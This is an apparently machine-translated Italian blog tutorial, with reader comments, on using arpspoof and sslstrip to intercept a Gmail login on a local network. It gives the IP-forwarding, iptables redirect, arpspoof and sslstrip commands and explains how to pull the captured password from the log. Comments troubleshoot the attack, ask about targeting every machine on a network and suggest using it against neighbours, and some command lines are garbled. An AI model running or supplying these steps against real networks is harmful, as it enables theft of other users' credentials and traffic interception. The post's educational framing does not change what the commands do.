ArpSpoofing e SSlstrip in azione.

Ciao Blogger.

Per oggi ho un piccolo esempio di quanto possa essere pericoloso essere connesso a qualsiasi rete senza la sicurezza di quelle che piacciono a tanti di noi.

Per oggi, userò ArpSpoofing con Sslstrip per ottenere una password Gmail. Per rendere l'ambiente più controllato, ho creato un account chiamato "testarp@gmail.com".

E poiché non mi piacciono molto i preamboli, mettiamoci al lavoro.

Non sono responsabile in alcun momento di ciò che possono fare con le seguenti informazioni. Lo faccio esclusivamente per scopi educativi

AMBIENTE

Per questo test quello che abbiamo è il seguente:

1. Attaccante: È il mio desktop o computer desktop che ha Debian Wheezy. Dai repository puoi installare striscia y annusare arrivare ad avere arpionamento

2. Vittima: La vittima è un tablet Android che vuole vedere la sua posta solo attraverso il browser.

3. Il mezzo: Il mezzo è mio Router Cisco DPC2425

INDIRIZZI.

Indirizzo dell'attaccante: 172.26.0.2

Indirizzo router: 172.26.0.1

Indirizzo della vittima: 172.26.0.8

L'ATTACCO:

Per capire un po 'di più come funziona l'attacco, puoi andare al mio vecchio POST

La prima cosa che faremo per questo attacco è attivare l'inoltro in modo che il nostro computer possa inoltrare le informazioni alla vittima senza che se ne accorga. (Altrimenti sarebbe un attacco denial of services)

Per questo useremo:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Ogni comando in una finestra della console diretta.

Ora se facciamo tail -f desdelinux vediamo le informazioni dal vivo e dirette

snapshot1

Allora come otteniamo quello che vogliamo?

Inseriamo prima la nostra posta sul Tablet. Durante l'accesso, vediamo che migliaia e migliaia di cose appaiono sulla nostra console.

Ora che è finito apriamo il nostro file “desdelinux” con nano

nano desdelinux

con Control + W cerchiamo qualcosa chiamato SECURE POST.

E vedremo qualcosa di simile.

snapshot2

Tra quella linea enorme che non può essere vista c'è l'email e la password della vittima.

Quindi corriamo a destra finché non vediamo finalmente la luce alla fine del tunnel.

snapshot3

In un'altra occasione vedremo come proteggerci un po 'da questi attacchi.

saluti


Lascia un tuo commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati con *

*

*

  1. Responsabile dei dati: Miguel Ángel Gatón
  2. Scopo dei dati: controllo SPAM, gestione commenti.
  3. Legittimazione: il tuo consenso
  4. Comunicazione dei dati: I dati non saranno oggetto di comunicazione a terzi se non per obbligo di legge.
  5. Archiviazione dati: database ospitato da Occentus Networks (UE)
  6. Diritti: in qualsiasi momento puoi limitare, recuperare ed eliminare le tue informazioni.

  1.   @Jlcmux suddetto

    Colgo l'occasione per dire che quando il post è stato pubblicato, i comandi non erano corretti.

    Al comando iptables alla fine manca l'8080 che si trova su un'altra riga. E poi i comandi arpspoof erano tutti sulla stessa linea. Ogni comando si trova su una riga diversa.

    Si spera che l'editor lo veda e possa aggiustarlo.

    Saluti.

    1.    Manuale della Fonte suddetto

      Ho fatto le correzioni che hai menzionato, va bene?

      Se hai intenzione di inserire il codice in una voce preferita, utilizza la visualizzazione HTML e verifica che l'articolo sia corretto prima di inviarlo in sospeso. Grazie.

  2.   Luis suddetto

    È agghiacciante sapere che quelli di noi che non hanno la conoscenza sono così vulnerabili. Informazioni molto buone anche quando capisco poco dell'argomento mi rendo conto dell'importanza. Grazie!
    saluti

  3.   Giskard suddetto

    Ma funziona solo se l'aggressore e la vittima sono sulla stessa rete. In ogni caso, mi sembra che se (essendo sulla stessa rete) ti connetti tramite HTTPS ciò non accade perché i dati vengono crittografati PRIMA di lasciare la tua macchina. Se ti connetti tramite HTTP (senza S) penso che anche guardando il cavo di rete si vedano le chiavi.

    1.    @Jlcmux suddetto

      Non è vero. Sto hackerando una password di Gmail e se noti che Gmail utilizza https. Così? Il punto è che sebbene https sia sicuro, dipende da http. Quindi non è così sicuro.

      Non confessare così tanto su un https che la S non è per Superman è per "sicuro"

    2.    Rten suddetto

      funziona con o senza https, l'ho provato con una distro linux più specializzata e funziona senza problemi

    3.    Manuale della Fonte suddetto

      Puoi usarlo proprio per dare una lezione a coloro che rubano il tuo Wi-Fi. 😀

      È più o meno come quello che dicevano tanto tempo fa sul blog di Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonante suddetto

        Ostia, grande cosa fa! / E poi mi dicono paranoico ogni volta che uso la VPN quando vanno a controllare il conto in banca ...). A proposito, devi vedere quanto sono ciniche le persone nei commenti ... se alla fine sta rubando ...

        1.    eliotime3000 suddetto

          Ora dobbiamo seguire un tutorial su come creare e offrire il tuo servizio VPN.

      2.    Daniel suddetto

        La storia che colleghi è molto interessante, sembra persino degna di un romanzo, e questo mi ricorda quando usavo Internet dei miei vicini e sebbene dica di conoscere l'argomento, penso che non avrei mai potuto vedere le vere dimensioni del pericolo che avrei potuto durare, fortunatamente per me, hanno solo cambiato la password in WPA2 ed è lì che è iniziata la mia storia con l'ISP haha

    4.    Mauritius suddetto

      Ecco perché il titolo dice Sslstrip in azione.

      Funziona finché l'attaccante è nel mezzo

  4.   anon suddetto

    Con quale onda lavori a prisma? -.-
    no.
    Cosa aspetti a inviare la tua richiesta XD
    saluti
    buon post

  5.   auroszx suddetto

    Interessante, farò un test educativo più tardi ... Forse potrei anche rimuovere la password dal WiFi e divertirmi un po '😛
    Per caso, puoi fare qualcosa di simile per inviare pagine diverse a quelle richieste dal target? Ad esempio, vogliono aprire Facebook e io li reindirizzo a Google? 😛

    1.    @Jlcmux suddetto

      Sì. Ma è tutto un tiro molto diverso.

      Forse lo posterò più tardi.

  6.   ultimo novellino suddetto

    post molto buono, questi argomenti sono molto educativi, ora bisogna riuscire a contrastare questo attacco, dato che alcuni (come me) si collegano a reti pubbliche (l'università per esempio) sarebbe utile evitarlo.

    Saluti!

  7.   solo un altro utente dl suddetto

    Non ha funzionato per me 🙁

  8.   più bello suddetto

    Qualcosa mi manca qui, a parte il fatto che le connessioni https sono crittografate tramite un certificato del server (una volta che hai il certificato sulla tua macchina, il tuo browser è responsabile della crittografia) con iptables reindirizzi la porta 80 (http), non 443 , che è https

    1.    @Jlcmux suddetto

      Lo pensavo anch'io. Il punto è che sebbene https sia "sicuro", purtroppo dipende da http. Quindi sslstrip ne approfitta, fa credere al browser che stia utilizzando le credenziali https ma non lo è.

      1.    più bello suddetto

        merda santa! ma il browser dovrebbe visualizzare un avviso del tipo "questo certificato proviene da un sito sospetto o qualcosa del genere" ... dovrò sicuramente fare dei test XD

        1.    @Jlcmux suddetto

          No, non viene fuori assolutamente nulla.

  9.   solo un altro utente dl suddetto

    Finalmente ha funzionato per me
    Sono connesso a una rete WEP con password e mi ha comunque mostrato la password direttamente.

    Una domanda. Puoi fare la stessa procedura ma per tutti i computer che sono collegati in rete, invece di avere una sola vittima?

    1.    @Jlcmux suddetto

      Si, puoi. Ma non ho fatto esperimenti. Provalo tu stesso e dicci come va.

  10.   sinnick19 suddetto

    L'unica cosa che ottengo con questo è che la macchina della vittima va offline, ma sslstrip non mi mostra nulla: /

    1.    @Jlcmux suddetto

      Dovresti disabilitare il firewall per un momento. O almeno abilita le connessioni in entrata.

  11.   Mr Black suddetto

    Probe ed io abbiamo potuto vedere solo username e password della pagina facebook, in gmail non ho trovato nessun risultato nel log, inoltre mi serviva solo una riga di arpspoof «arpspoof -i -t«. D'altra parte, la macchina vittima non poteva aprire alcune pagine. Continuerò a indagare, è molto interessante. Un aiuto per chi usa Manjaro, i pacchetti da installare sono: dsniff (qui c'è arpspoff), twisted e python2-pyopenssl. Sslstrip può essere scaricato da qui: http://www.thoughtcrime.org/software/sslstrip/
    Per eseguirlo $ python2 sslstrip.py
    Saluti.

  12.   Mr Black suddetto

    Non è uscito ma la linea arpspoof è: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert suddetto

    guarda io faccio esattamente quello che dici:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    il problema è che la vittima che è un altro pc che ho qui nella mia stanza, non ho connessione al punto che devo riavviare il router, cosa posso fare mi aiuti.

    Un'altra cosa che sto lavorando con una macchina virtuale, e quando eseguo il comando iwconfig, wlan0 non appare, né quando eseguo ifconfig, tuttavia, se ho internet sulla mia macchina virtuale, cosa con un'interfaccia eth0.